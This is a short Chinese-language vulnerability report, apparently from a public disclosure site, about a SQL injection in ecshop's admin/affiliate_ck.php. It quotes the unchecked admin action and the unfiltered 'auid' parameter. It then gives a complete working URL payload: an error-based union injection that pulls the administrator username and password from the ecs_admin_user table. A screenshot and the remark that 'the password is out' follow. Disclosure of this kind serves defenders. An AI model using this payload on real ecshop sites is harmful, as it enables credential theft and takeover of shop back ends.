ecshop后台弱权限sql注入一枚

### 简要描述： ecshop后台弱权限sql注入一枚 ### 详细说明： PS:默认安装如果选择了安装测试数据就会多出2个帐号。本文再次从这两个帐号开始！ 漏洞发生在 admin/affiliate_ck.php 行29 ``` if ($_REQUEST['act'] == 'list') { $logdb = get_affiliate_ck(); .... } ``` 这里没有权限检查 然后移步到 方法get_affiliate_ck 224行有惊喜 ``` if (isset($_GET['auid'])) { $sqladd = ' AND a.user_id=' . $_GET['auid']; } ``` 未过滤的INT型注入。。。 就不多讲了 上代码 http://www.xxx.com/admin/affiliate_ck.php?act=list&auid=121%20or%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23 over ### 漏洞证明： [<img src="https://images.seebug.org/upload/201305/1723021317088bdef7c0dfd06b4c1b312f0e656d.jpg" alt="ecshop.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/1723021317088bdef7c0dfd06b4c1b312f0e656d.jpg) 密码出来了！